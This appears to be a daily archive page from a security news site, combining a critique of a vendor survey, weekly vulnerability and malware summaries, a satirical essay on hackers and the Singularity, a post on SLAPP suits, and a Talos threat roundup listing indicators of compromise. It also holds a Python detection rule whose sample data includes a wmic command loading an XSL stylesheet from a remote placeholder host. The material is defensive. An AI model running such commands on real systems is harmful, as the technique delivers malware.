Daily Archives: September 7, 2018

NBlog Sept 8 – chew before swallowing

The Global State of Online Digital Trust is a typical vendor-sponsored piece, a white paper (= marketing promotion in the guise of a 'survey') prepared by Frost & Sullivan for CA Technologies.

I say 'typical' in that they have disclosed hardly any information about the survey method and sample. The press release instructs us to see the report for "Full survey methodology details" but unless I'm blind, it looks to me as if someone either 'forgot' to write the materials-and-methods section or casually neglected to incorporate it in the published report. Oh dear.

A CA marketing VP called it "a survey of 1,000 consumers, 350 cybersecurity professionals and 325 business executives from all over the world" whereas the press release referred to it as "The global online survey of 990 consumers, 336 security professionals and 324 business executives across 10 countries". 

We can only guess at how they might have assigned respondents between the three categories, e.g. who would not qualify as a 'consumer'? Wouldn't a CISO fall into all three groups? In the report, numbers next to the graphs appear to indicate sample sizes of up to about 990.

Last time I checked, there were rather more than 10 countries in the world aside from USA BRA UK FRA GER ITA AUS IND JPN and CHN as listed in the report. If I'm interpreting those abbreviations correctly, that's well short of "all over the world".

If indeed the survey was online, that rather suggests the sample only consisted of people from the ten countries who were happy to answer an online survey - which itself implies a degree of trust in online security as well as a willingness to respond to a vendor-sponsored survey. 

It is unclear whether or how the report's conclusions relate to the survey findings ... and they are somewhat predictable given the report sponsor's commercial interests:
"CULTIVATE A CULTURE OF SECURITY Implement data protection policies that are in accordance with the world’s strictest data privacy regulations. Ensure company-wide familiarity with security policies, including among non-technical staff to reduce the risk of data breaches. 
START AT THE TOP Too many business executives see security initiatives as a negative return on investment. Alert the C-Suite to the tangible business impacts of a breach and a loss of consumer trust. 
COVER YOUR BASES Consumers consider both social and technical factors when determining whether to trust an organization; be sure that your organization has the technical foundation in place to mitigate attacks and have a response team ready to minimize damage to consumer trust in the event of a breach. 
KEEP IT SIMPLE Clear communication from organizations around policies and data handling practices is critical for building trust. Far too many organizations overestimate the degree to which consumers can easily manage their personal data online. Present your policies in simple language, and provide important details without overwhelming the consumer."
So they evidently equate "a culture of security" with data protection, data privacy and data breaches. Spot the common factor. A similar bias towards privacy law compliance and the protection of "customer data" is evident in all four paragraphs. That is an important issue, I agree, along with "cybersecurity" (an undefined term ... but I guess they mean IT security) but what about all the rest of information security: trade secrets, intellectual property, business continuity, physical and procedural security, information integrity, blah blah blah?

I freely admit to being heavily prejudiced in favour of both cultural development and management-level security awareness but their emphasis on breach impacts and consumer trust once again betrays a myopic focus on privacy breach incidents, while the conclusion about return on investment seems very suspect to me. I wonder if the survey question/s in that area were unambiguous enough to be interpreted in the same way by all the respondents? Or are the reported differences between the groups of respondents merely indicative of their distinct perspectives and assumptions? Did they even face the same questions? We can't tell since they choose not to disclose the survey questions.

The report introduces the term "Digital trust index". Sounds great, right? A metric concerning trust in, errr, digits? A percentage value relative to, um, what exactly? Oh let me guess, relative to the score conjured out of the air for this, the first report. And unfortunately for the sponsors, the term "Digital Trust Index" is already in use elsewhere.

Overall, a disappointing and essentially pointless read, like most other commercially-sponsored and heavily-promoted "surveys" I have read in my career, with few exceptions.

Clearly, I'm a slow learner, stubborn as an old boot. Venting my spleen through this blog is immensely helpful though, along with the vain hope that you might perhaps be persuaded to take a more critical look at the next "survey" that plops onto your screen. Chew it over rather than swallowing whole.

Security Flaws & Fixes – W/E – 090718

Android Blasts Sensitive Info Via WiFi Broadcasts (09/04/2018)
Researchers at Nightwatch Cybersecurity have discovered that system broadcasts by Android expose information about the user's device to all applications running on the device, including the WiFi network name, local IP addresses, DNS server information, and the MAC address. By listening to these broadcasts, any application on the device can capture this information, bypassing permission checks and existing mitigations. All versions of Android running on all devices are believed to be affected, including forks such as the one that powers Amazon's FireOS. Google fixed the issue in Android 9 but has no plans to patch earlier versions.

Cisco Advises on Vulnerabilities Found in Its Products (09/06/2018)
Cisco released a number of advisories to address vulnerabilities across its product lines. Among the most critical issues are a buffer overflow bug in the vendor's RV110W, RV130W, and RV215W Routers Management Interface and an unauthorized access issue in Umbrella products.

Mozilla Pushes Out Updates for Firefox and Firefox ESR (09/06/2018)
Mozilla has issued updates for Firefox and Firefox ESR. These updates address serious security issues and users are instructed to download them for risk mitigation.

Multiple Issues Fixed in Latest Version of Opsview Monitor (09/06/2018)
Core Security posted an advisory for Opsview Monitor due to multiple vulnerabilities. These issues could result in, among other things, remote code execution and cross-site scripting. Opsview was notified in May about these vulnerabilities and released updates in August. Opsview Monitor is used by DevOps personnel to "deliver smarter business services by providing unified insight into their dynamic IT operations whether on-premises, in the cloud, or hybrid," according to the vendor.

Open-Source Web Interface OctoPrint Exposes Thousands of 3D Printers (09/04/2018)
Nearly 4,000 instances of OctoPrint, an open-source 3D printer Web interface, are accessible online, leaving printers exposed to cyber attackers. Researchers at the SANS Internet Storm Center reviewed results from Shodan and learned that thousands of OctoPrint interfaces are available online, including 1,585 in the US alone. The researchers warn that this issue is a security nightmare because OctoPrint allows the download of 3D objects in G-code, which are unencrypted text files, so the data in those files can be taken by anyone who downloads them. Cybercriminals can also send malicious G-code files and instruct the exposed device to print them.

Oracle: Some of Our Products Affected by Apache Struts 2 Zero-Day Bug (09/04/2018)
Oracle has warned that some of its products are vulnerable to the critical Apache Struts 2 vulnerability that is being exploited in the wild. However, the vendor has stated that not all of its products that incorporate Struts 2 are necessarily affected. Oracle recommends that customers frequently review the original advisory, which lists affected products and versions, and plan to apply the updates as soon as they are released.

Philips e-Alert Unit Found to Have Multiple Security Issues (09/04/2018)
An ICS-CERT advisory gives details regarding multiple vulnerabilities identified in the Philips e-Alert Unit, which is a non-medical device. Version R2.1 and prior are vulnerable. It is recommended that users review materials on Philips' Web site for mitigation and update information.

RCE Bug in PHP Package Server Receives Patch (09/04/2018)
Security researcher Max Justicz found a remote code execution vulnerability on packagist.org, the default package server behind Composer, a PHP package manager. Packagist serves about 400 million package downloads each month. The vulnerability was reported and has since been alleviated.

Routers' Automatic DNS Registration and Autodiscovery Cause Security Risks (09/05/2018)
An advisory from US-CERT details an issue in which routers auto-registering names on LANs can result in the loss of confidentiality and integrity of any network activity by giving an attacker the opportunity to view network packets. If an attacker with access to the network adds a malicious device named 'WPAD', that attacker may be able to use DNS autoregistration and autodiscovery to act as a proxy for victims on the network, resulting in a loss of confidentiality and integrity of any network activity. Home/office LAN/WLAN routers should not auto-register local DNS magic names related to autoconfiguration. Furthermore, autodiscovery features should not accept mDNS-based names as authoritative sources.

Third-Party Company Issues "Micropatch" for Microsoft Zero-Day Flaw (09/04/2018)
A local privilege escalation vulnerability has been fixed in Windows Task Scheduler but it wasn't Microsoft that patched it. The security team at 0patch, which issues small fixes for vulnerabilities or "micropatches," delivered a 13 KB patch. It is expected that Microsoft will issue its own fix in its September batch of security patches.

Upgrades Mitigate Security Bug in Opto22 PAC Control Basic and PAC Control Professional (09/05/2018)
A stack-based overflow vulnerability could cause a crash and then result in a buffer overflow condition in Opto22's PAC Control Basic and PAC Control Professional. Users have been instructed to upgrade to the latest version. The ICS-CERT has also posted its own advisory.

Malware Watch – W/E – 090718

Aggressive MagentoCore Skimmer Taints Over 7,000 Ecommerce Sites (09/05/2018)
MagentoCore has become the most prolific online skimmer after it was determined that over 7,000 individual stores have been turned into zombie money machines. At least 1,450 stores have hosted the MagentoCore.net parasite since February. The MagentoCore skimmers gain illicit access to the control panel of an ecommerce site, often with brute force techniques by automatically trying lots of passwords, sometimes for months. Researcher Willem de Groot analyzed the skimmer and identified 7,339 ecommerce sites that have been infected.

Latest Apache Struts Bug Exploited to Mine for Monero (09/06/2018)
A remote code execution vulnerability for Apache Struts 2 that was released in August is being exploited in a cryptocurrency mining campaign. F5 researchers identified the campaign as "CroniX" and spotted it two weeks after the new Struts 2 vulnerability was first discovered. CroniX mines for Monero.

Microsoft's WMIC Utility Abused to Download Malware (09/04/2018)
Cybercriminals are using Microsoft's Windows Management Instrumentation Command-line (WMIC) utility and an eXtensible Stylesheet Language (XSL) file, which typically would not be threatening, to push out malware, the researchers at Symantec say. WMIC is being used to download malicious files as part of the multi-stage infection chain. The researchers hypothesize that the miscreants are using this tactic to avoid detection.
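As an added illustration (not code from the original post or from Symantec's research), the following Python sketches the kind of detection rule a defender could run over process-creation command lines to flag wmic loading an XSL stylesheet from a URL, a UNC path or an explicit .xsl file rather than one of its built-in output formats; the sample command lines and the example.invalid host are constructed.

```python
import re

# Constructed sample process-creation command lines for the demo; none of these
# come from the original article or from Symantec's report.
SAMPLE_COMMAND_LINES = [
    r'C:\Windows\System32\wbem\WMIC.exe os get /format:list',
    r'wmic process list brief /format:"http://example.invalid/style.xsl"',
    r'WMIC.exe /node:"WS01" os get caption /FORMAT:"\\fileshare\public\report.xsl"',
    r'powershell.exe -NoProfile -Command Get-Process',
    r'wmic computersystem get name /format:csv',
]

# wmic or wmic.exe as the executable token, optionally preceded by a path
WMIC_RE = re.compile(r'(?:^|[\\/\s"])wmic(?:\.exe)?(?=["\s]|$)', re.IGNORECASE)
# the /format: switch and its (optionally quoted) argument
FORMAT_RE = re.compile(r'/format:\s*"?([^"\s]+)', re.IGNORECASE)
# stylesheet locations that mean wmic is fetching XSL over the network
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def analyze_command_line(cmdline):
    """Return a finding dict if cmdline is wmic loading a non-builtin XSL
    stylesheet, else None. Built-in formats (list, csv, table, ...) are
    bare names without a path or extension and are left alone."""
    if not WMIC_RE.search(cmdline):
        return None
    match = FORMAT_RE.search(cmdline)
    if not match:
        return None
    target = match.group(1)
    reasons = []
    if REMOTE_RE.match(target):
        reasons.append("stylesheet fetched over the network")
    if target.startswith("\\\\"):
        reasons.append("stylesheet loaded from a UNC path")
    if target.lower().endswith(".xsl"):
        reasons.append("explicit .xsl file supplied to /format")
    if not reasons:
        return None
    return {"cmdline": cmdline, "format_target": target, "reasons": reasons}


def scan(command_lines):
    """Run the rule over a batch of command lines and collect the hits."""
    return [f for f in map(analyze_command_line, command_lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMAND_LINES):
        print(finding["format_target"], "->", "; ".join(finding["reasons"]))
```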

Sophisticated CamuBot Malware Targets Brazilian Banks and Customers (09/05/2018)
IBM's X-Force researchers reviewed CamuBot, a financial malware targeting Brazilian banking customers. The malware's operators are actively using it to target companies and public sector organizations, mixing social engineering and malware tactics to bypass strong authentication and security controls. CamuBot uses new code, doesn't hide its deployment, and promotes bank logos and brand imaging to make it appear as a legitimate application.

Cybercrime – W/E – 090718

Malicious Android Campaign Takes Aim at the Middle East (09/04/2018)
Symantec has shared details about the APT-C-23 threat group that has targeted victims in the Middle East, registered hundreds of domains, and infected thousands of people in more than 20 countries. The group uses chat applications and fake updates to popular apps to hide its malware and distributes the nefarious files via SMS with a URL to Google Drive or a command and control domain that hosts the Android Package Kit.

OilRig Threat Group Continues to Plague Middle East with OopsIE Trojan in Tow (09/06/2018)
The OilRig threat group is hitting entities in the Middle East and using a revamped version of the OopsIE Trojan, research from Palo Alto Networks has determined. OilRig is thought to have connections to the Iranian Intelligence agency and the Islamic Revolutionary Guard Corps. OopsIE, which was first identified in February, is a data exfiltration malware, but the latest variant includes significant updates to its anti-detection techniques.

The Ties that Bind: Research Links Threat Groups with Chinese Government (09/06/2018)
APT10, a threat actor thought to be in China, may have ties to the Chinese Ministry of State Security (MSS). CrowdStrike cited research from other security vendors and explained that APT10, which is also known by various other names including Stone Panda, was analyzed by an anonymous group called IntrusionTruth, which found several instances that connect the threat entity with the Chinese security agency. CrowdStrike warned that another group, Gothic Panda (also known as APT3), has connections to MSS.

Thousands of MikroTik Routers Attacked to Eavesdrop on Traffic (09/06/2018)
Over 7,500 MikroTik routers are being exploited by cyber thieves using a vulnerability to intercept Internet traffic. The vulnerability, which is found in Winbox, a component of the MikroTik RouterOS software, lets the thieves gain access to routers that have the Socks4 proxy enabled. Further details regarding this issue have been made available by 360 Netlab.

Hackers and Worms in the Singularity

So I saw an ad for this project, “OpenWorm.” Seemed like it checked all the boxes that cause me to click a link:

  • Vaguely open source
  • Something to do with Legos
  • Robots
  • Has an app associated with it. “Get the App!”
  • And it’s for “real worm geeks!”

I consider myself a geek, and I’m real. Except, what the hell is the worm part? And even though I’m a real geek, I’m not a “worm geek.” Eeewww.

 

Turns out that the OpenWorm project is trying to digitally simulate the mind of one of Earth’s simplest creatures, the C. elegans nematode, a microscopic worm with only 302 neurons and 95 muscle cells. Researchers have scanned C. elegans and uploaded its neural map into a docker container or something, where you can troll it with various stimuli and model its reactions.

 

Its tiny brain is even smaller than those of many YouTube celebrities and can easily fit into an app on your phone.

 

[Image: Ray Kurzweil. Photo by Michael Lutch. Courtesy of Kurzweil Technologies, Inc., CC BY 1.0]

 

The Singularity

 

The OpenWorm project reminds me of an upcoming event that’s going to solve all my aching-old-man problems: the Singularity. Coined by futurist Ray Kurzweil, the Singularity is defined as the moment when human consciousness merges with, or is surpassed by, artificial intelligence. After that moment, history will be defined as “prior to” and “after” the Singularity, because civilization will change radically.

 

There are two possible pathways to the Singularity. The optimistic route is that science will figure out how to scan a human mind and upload it into the cloud while preserving its consciousness. Once we’ve shuffled off this mortal coil, we’ll all be immortal. The OpenWorm project is a baby step toward that goal of immortality.

 

I’m already looking forward to picking out a sporty android body to carry my artificial intelligence around. Brand consultants at Tesla should be on this, because people are going to be self-conscious about what model of robot body they are rocking.

 

There’s a second, darker path to the Singularity. You’re eating your Wheaties and reading the paper in the morning and you tell your life partner, “Hey, babe, it says here that those ‘geniuses’ at Google created an artificial intelligence that achieved consciousness. And, yup, it’s already decided to exterminate the human race. Knew this would happen. Thanks, Obama.”

 

In this darker scenario, evil-looking male robots will be assigned to hunt and track human scum in the shelled-out underworld of Mountain View, California. It’s a trope we’re all so familiar with and no one will be surprised if it happens.

 

Stop and consider for a moment. What will the role of hackers be in the Singularity? It depends on how we get there.

 

Hackers in the Singularity

 

On the “light” path, where human minds migrate into computers, hacking will become the worst possible crime that anyone could commit. Hacking someone else’s mind could be tantamount to murder (or “real-death” in Altered Carbon lingo), or slavery. Hackers will be the equivalent of demons attacking your mind. Imagine you and your bestie are walking down Robson Street in your Tesla model XY robot sleeves, when suddenly your friend freezes and the words “ALL YOUR BASE ARE BELONG TO US” start scrolling across his face. “OMG, dude. You’re being hacked right now!” you exclaim, and you try to summon the Royal Canadian Mounted Cyber Police. But the only acknowledgement you receive is “IM IN UR BASE KILLING UR D00DZ,” and you realize you’re being hacked, too. Chilling, isn’t it?

 

On the “dark” path, Google Exterminator™ droids are using advanced data analytics to find the last pockets of human resistance to show them ads immediately prior to dispatching them. Hacking, in this world, will become humanity’s greatest hope, and hackers will be heroes. They will be freedom fighters like John Connor or Moses, and the black hoodie will be the symbol of resistance and liberation. Hackers will finally breach G Suite, perform lateral movements, and smash its defense grid.

 

Now, isn’t that interesting? On one path to the Singularity, hacking is the worst possible crime. But on the other path, hacking is humanity’s highest calling. Either way, the absolute value of hackers is going to be maximal. If you’re a young reader trying to choose a career, infosec should be an even more enticing option now that you’ve gamely read this whole article.

 

There’s an artificial intelligence conference in Australia that polls its attendees about when they think the Singularity will happen. Most recent guesses say 2040, though some predict it will come as early as 2020.  Guys, that’s super close. The Texas Rangers, bless their hearts, have never won a World Series and may never get a chance to do so, because one assumes that, in the Singularity, all baseball games will be simulated inside silicon-based computers and have team names like the Dell Blades, the Intel Insides, or the Nippon Ham Fighters (oh, wait, that last one is already taken).

 

Since it’s looking like the Singularity will be a thing before I succumb to liver cirrhosis, I can probably stop contributing to my flaccid 401(k) retirement plan, because who’s going to need those in the Singularity?

 

Copyright 2010 Respective Author at Infosec Island

Join us in fighting back against powerful corporations trying to silence news and advocacy organizations

Protest the Protest

This week, Greenpeace, along with Freedom of the Press Foundation and dozens of other advocacy groups, is launching an important campaign called Protect the Protest, which aims to draw attention to a dangerous tactic that corporations use all too often to chill the free speech of Americans.

SLAPP suits, or “strategic lawsuits against public participation,” are brought by wealthy individuals or organizations in an attempt to silence critical speech; powerful people bring these types of libel lawsuits knowing they won’t win on the merits, but they hope they can silence critics by bleeding them dry of resources or bankrupting them altogether.

Greenpeace is the defendant in two particularly egregious lawsuits that we wrote about earlier this year, which actually accuse Greenpeace of violating the RICO statute (a law used to go after organized crime) for engaging in routine advocacy. These types of lawsuits chill the speech of non-profit organizations and protesters, and prevent public transparency and accountability of those in power. The suits also directly impact press freedom.

SLAPP suits are particularly dangerous when used against journalists and news organizations. In the past few years, we’ve seen several high-profile cases of extremely wealthy individuals and corporations threatening to sue, or actually suing, public interest news organizations for libel over stories which they didn’t like.

The non-profit news organization Mother Jones had to fend off an incredibly expensive lawsuit brought by a billionaire political fundraiser a few years ago that they were worried might ultimately bankrupt the organization. The civil liberties news website Techdirt faced a similar lawsuit that had them contemplating shutting their doors last year. (Both eventually won their cases.)

And of course, billionaire Peter Thiel infamously funded a series of lawsuits that ultimately destroyed Gawker.

The billionaire with the most prolific history of bringing lawsuits against journalists who report critically on him currently occupies the White House. Donald Trump brought over half a dozen SLAPP lawsuits against journalists over his decades in public life and has threatened over a dozen more.

It’s important to emphasize that in almost all of these cases, the lawsuits were never going to win. Anyone who glanced at the stories in question could tell the speech of the defendants was protected by the First Amendment. The problem is that these powerful people often don’t care about winning; they care about inflicting damage. Maybe they will be able to decimate the news outlet by forcing it to spend millions in legal fees. Even if the plaintiff loses, the next time the news outlet will think twice before going forward with an investigation. Or maybe they’ll scare the countless other news organizations who may be planning similar stories.

(Note: while Gawker did lose an invasion of privacy case that eventually bankrupted the company, it had several other libel suits funded by Thiel that were pending, all of which were standard SLAPP suits. The invasion of privacy case would’ve likely been overturned by an appeals court if Gawker had the funding to continue fighting.)

Ultimately, the Protect the Protest campaign is not just about Greenpeace. Luckily, they have an excellent team of lawyers and have decided to very publicly fight back against these dangerous threats. I have no doubt they will prevail. This campaign is about protecting all of the smaller non-profits, the smaller news organizations who will think twice about reporting on people in power due to the fact that they know they may be subject to millions of dollars of litigation for speaking out. And we are proud to stand with them as they expand this fight.

You can find more information about the campaign here, and here’s how you can join the fight.

Threat Roundup for August 31 to September 7

Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Aug. 31 and Sept. 7. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

  • Win.Dropper.Generickdz-6671833-0
    Dropper
    This is a BobSoft Delphi application that wraps malware. In the current campaign, the HawkEye spyware is installed. The malware uses process hollowing to keep itself hidden from detection, and achieves persistence across reboots by leveraging an autostart key in the Windows registry.

  • Win.Dropper.Kovter-6669952-0
    Dropper
    Win.Dropper.Kovter-6669952-0 is a dropper written in Visual Basic. It is distributed via email, and makes use of PowerShell scripts and large objects in the registry to conceal its embedded malware.

  • Win.Dropper.Upatre-6669126-0
    Dropper
    Win.Dropper.Upatre-6669126-0 is dropped by a Word document in our ThreatGrid sandbox. The sample potentially performs a code injection circumventing Windows' DEP through memory pages allocated with PAGE_EXECUTE_READWRITE permissions.

  • Doc.Dropper.Valyria-6668024-0
    Dropper
    Doc.Dropper.Valyria-6668024-0 is a malicious Word document that drops malware. The campaign currently spreads the Emotet malware.

  • Doc.Dropper.Chronos-6667983-0
    Dropper
    This malicious Word document was discovered after it dropped an executable in our ThreatGrid sandbox. The campaign currently delivers a banking trojan, which will redirect internet traffic through the malware's proxy and try to steal banking credentials.

  • Win.Packed.Generic-6667111-0
    Packed
    This is a Visual Basic executable that will change proxy settings on the victim's machine to inspect internet traffic and thus steal information. It also tries to steal local passwords from the browser's password database.

Threats

Win.Dropper.Generickdz-6671833-0

Indicators of Compromise

Registry Keys
  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\33fd244257221b4aa4a1d9e6cacf8474
  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4c8f4917d8ab2943a2b2d4227b0585bf
  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
  • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
  • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: MJOXV418GJ
Mutexes
  • 8-3503835SZBFHHZ
  • 59802CRW6VIZ62Az
IP Addresses
Domain Names
Files and or directories created
  • %AppData%\59802CRW\598log.ini
  • %AppData%\59802CRW\598logim.jpeg
  • %AppData%\59802CRW\598logrc.ini
  • %AppData%\59802CRW\598logri.ini
  • %AppData%\59802CRW\598logrv.ini
  • \TEMP\2995593463.exe
File Hashes

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella (images not included in this text).

Win.Dropper.Kovter-6669952-0

Indicators of Compromise

Registry Keys
  • <HKLM>\SOFTWARE\WOW6432NODE\3E00E5E2D21AC4F4EC6F
    • Value Name: CA640AB774DC8DC9D58
  • <HKLM>\SOFTWARE\WOW6432NODE\EDXF9XO
    • Value Name: MWZPeJZV
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: 8567f942
Mutexes
  • B3E8F6F86CDD9D8B
  • EA4EC370D1E573DA
  • A83BAA13F950654C
IP Addresses
Domain Names
  • N/A
Files and or directories created
  • %LocalAppData%\Temp\pygjwa3p.ah2.ps1
  • %LocalAppData%\Temp\tgzjqzza.auy.psm1
  • \TEMP\b9a27f6553f2b34d18b9c1dd49e5877e30a9c9a38147f376b20f2cf9913aabad.exe
File Hashes

Coverage

Screenshots of Detection (AMP, ThreatGrid)

Win.Dropper.Upatre-6669126-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses
  • N/A
Domain Names
  • N/A
Files and or directories created
  • %LocalAppData%\Temp\vipkewek.exe
File Hashes

Coverage

Screenshots of Detection (AMP, ThreatGrid)


Doc.Dropper.Valyria-6668024-0


Indicators of Compromise


Registry Keys
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
    • Value Name: WpadDecisionTime
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\94-AF-8E-F4-CD-0F
    • Value Name: WpadDecisionReason
  • <HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS
    • Value Name: ld3
Mutexes
  • Global\I98B68E3C
  • Global\M98B68E3C
  • PEM1E4
  • PEM1A0
  • PEM9C8
IP Addresses
Domain Names
Files and or directories created
  • \efsrpc
  • %UserProfile%\707.exe
  • %WinDir%\SysWOW64\LDCjSm5OOdIv.exe
  • %LocalAppData%\Temp\zzdz1frv.zq1.psm1
  • %LocalAppData%\Temp\idwlwvc1.j0h.ps1
  • %WinDir%\SysWOW64\nZJz1AtlwhH6.exe
File Hashes

Coverage

Screenshots of Detection (AMP, ThreatGrid, Umbrella)


Doc.Dropper.Chronos-6667983-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBT\PARAMETERS\INTERFACES\TCPIP_{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpNetbiosOptions
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBT\PARAMETERS\INTERFACES\TCPIP_{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpNameServerList
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpDefaultGateway
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpNameServer
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpDefaultGateway
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpSubnetMaskOpt
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
  • <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\Root
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\Certificates
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CRLs
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CTLs
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\Certificates
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CTLs
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • Value Name: DefaultConnectionSettings
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyEnable
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyServer
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyOverride
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: AutoConfigURL
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: AutoDetect
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • Value Name: SavedLegacySettings
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: ProxyBypass
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: IntranetName
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpInterfaceOptions
Mutexes
  • Global\I98B68E3C
  • Global\M98B68E3C
  • PEM1A4
  • PEM558
  • PEM948
  • PEMBE4
IP Addresses
Domain Names
  • withachoice[.]com
Files and or directories created
  • %System32%\config\SYSTEM.LOG1
  • %LocalAppData%\Temp\5jhjztfi.inm.psm1
  • %LocalAppData%\Temp\dgnniruc.yui.ps1
  • %UserProfile%\Documents\20180906\PowerShell_transcript.PC.s2CSwKhg.20180906171831.txt
  • %UserProfile%\157.exe
File Hashes

Coverage

Screenshots of Detection (AMP, ThreatGrid)

Win.Packed.Generic-6667111-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: internat.exe
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: ProxyBypass
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: IntranetName
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: IntranetName
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: UNCAsIntranet
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: AutoDetect
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyEnable
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyServer
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyOverride
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: AutoConfigURL
